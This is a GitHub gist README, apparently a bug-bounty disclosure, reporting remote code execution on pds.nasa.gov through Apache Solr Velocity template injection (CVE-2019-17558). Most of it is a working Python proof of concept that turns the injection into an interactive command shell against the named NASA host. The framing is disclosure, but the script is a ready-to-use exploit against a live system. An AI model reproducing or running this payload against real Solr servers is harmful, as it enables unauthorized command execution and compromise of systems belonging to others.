Skip to content

Instantly share code, notes, and snippets.

@P0cas

P0cas/README.md Secret

Last active March 1, 2022 12:50
Show Gist options
  • Save P0cas/1eff60bd3653f5739f041ea34e152f62 to your computer and use it in GitHub Desktop.
Save P0cas/1eff60bd3653f5739f041ea34e152f62 to your computer and use it in GitHub Desktop.
Remote Code Execution - pds.nasa.gov [NASA]

Description

I discovered an RCE vulnerability using 1-Day on pds.nasa.gov at the end of 2021. This vulnerability is SSTI (CVE-2019-17558) in Apache Solr. I am very honored to be able to find these 1-Day exploits on NASA.


Proof of Concept

스크린샷 2022-03-01 21 35 59

import requests

def exploit():
  while True:
      cmd = input(">> ")
      url = "https://pds.nasa.gov/services/search/search?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end".format(cmd)
      print(f'[*] PoC : {url}')
      print(requests.get(url).text)
      
if __name__ == '__main__':
  print("[*] Exploit")
  print("[*] 1-Day : CVE-2019-17558")
  print("[*] URL   : https://pds.nasa.gov")
  exploit()

I wrote a PoC as above. It is a great honor to contribute to NASA again. Thank You. (For the universe)


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment